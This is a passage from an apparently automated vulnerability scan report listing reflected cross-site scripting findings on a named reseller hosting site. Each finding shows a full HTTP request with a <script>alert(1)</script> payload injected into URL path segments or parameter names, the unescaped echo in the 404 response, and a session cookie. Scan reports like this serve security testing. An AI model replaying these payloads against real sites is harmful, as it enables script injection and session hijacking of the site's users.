Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos417d0<script>alert(1)</script>1ac3b571b70/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5586. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 474ea<script>alert(1)</script>305dc6046e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images474ea<script>alert(1)</script>305dc6046e/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images474ea<script>alert(1)</script>305dc6046e/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5587. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload aa5fe<script>alert(1)</script>2b59dede67f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/reviewaa5fe<script>alert(1)</script>2b59dede67f/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/reviewaa5fe<script>alert(1)</script>2b59dede67f/0.gif was not found on this server.</p>
...[SNIP]...

2.5588. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a964b<script>alert(1)</script>a61ef6fefd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/0.gifa964b<script>alert(1)</script>a61ef6fefd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/0.gifa964b<script>alert(1)</script>a61ef6fefd was not found on this server.</p>
...[SNIP]...

2.5589. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 807af<script>alert(1)</script>ae132008541 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/0.gif?807af<script>alert(1)</script>ae132008541=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/0.gif?807af<script>alert(1)</script>ae132008541=1 was not found on this server.</p>
...[SNIP]...

2.5590. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 45a44<script>alert(1)</script>79c5e2b46dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service45a44<script>alert(1)</script>79c5e2b46dc/web-hosting/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service45a44<script>alert(1)</script>79c5e2b46dc/web-hosting/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5591. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48549<script>alert(1)</script>27c5732373c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting48549<script>alert(1)</script>27c5732373c/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting48549<script>alert(1)</script>27c5732373c/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5592. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c29e4<script>alert(1)</script>20fd1b9a54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesc29e4<script>alert(1)</script>20fd1b9a54/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesc29e4<script>alert(1)</script>20fd1b9a54/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5593. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16a7b<script>alert(1)</script>d612295e8b8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos16a7b<script>alert(1)</script>d612295e8b8/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos16a7b<script>alert(1)</script>d612295e8b8/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5594. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 47f8d<script>alert(1)</script>8e39fb477e9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images47f8d<script>alert(1)</script>8e39fb477e9/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images47f8d<script>alert(1)</script>8e39fb477e9/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5595. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e2588<script>alert(1)</script>6c5914d42a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/reviewe2588<script>alert(1)</script>6c5914d42a0/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/reviewe2588<script>alert(1)</script>6c5914d42a0/5.gif was not found on this server.</p>
...[SNIP]...

2.5596. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 58d13<script>alert(1)</script>d08dc9904e6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/5.gif58d13<script>alert(1)</script>d08dc9904e6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/5.gif58d13<script>alert(1)</script>d08dc9904e6 was not found on this server.</p>
...[SNIP]...

2.5597. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5374c<script>alert(1)</script>1362c746fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/5.gif?5374c<script>alert(1)</script>1362c746fa2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/5.gif?5374c<script>alert(1)</script>1362c746fa2=1 was not found on this server.</p>
...[SNIP]...

2.5598. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8792b<script>alert(1)</script>8b6497fd47c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service8792b<script>alert(1)</script>8b6497fd47c/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service8792b<script>alert(1)</script>8b6497fd47c/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5599. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload edc45<script>alert(1)</script>0cc8365c8eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hostingedc45<script>alert(1)</script>0cc8365c8eb/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingedc45<script>alert(1)</script>0cc8365c8eb/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5600. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 83428<script>alert(1)</script>e76d57ab655 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes83428<script>alert(1)</script>e76d57ab655/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes83428<script>alert(1)</script>e76d57ab655/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5601. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e723d<script>alert(1)</script>2280f5d515d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmose723d<script>alert(1)</script>2280f5d515d/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmose723d<script>alert(1)</script>2280f5d515d/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5602. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 52c4e<script>alert(1)</script>a1c3d315ecb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images52c4e<script>alert(1)</script>a1c3d315ecb/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images52c4e<script>alert(1)</script>a1c3d315ecb/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5603. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ce485<script>alert(1)</script>a2a3b086d6d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/reviewce485<script>alert(1)</script>a2a3b086d6d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
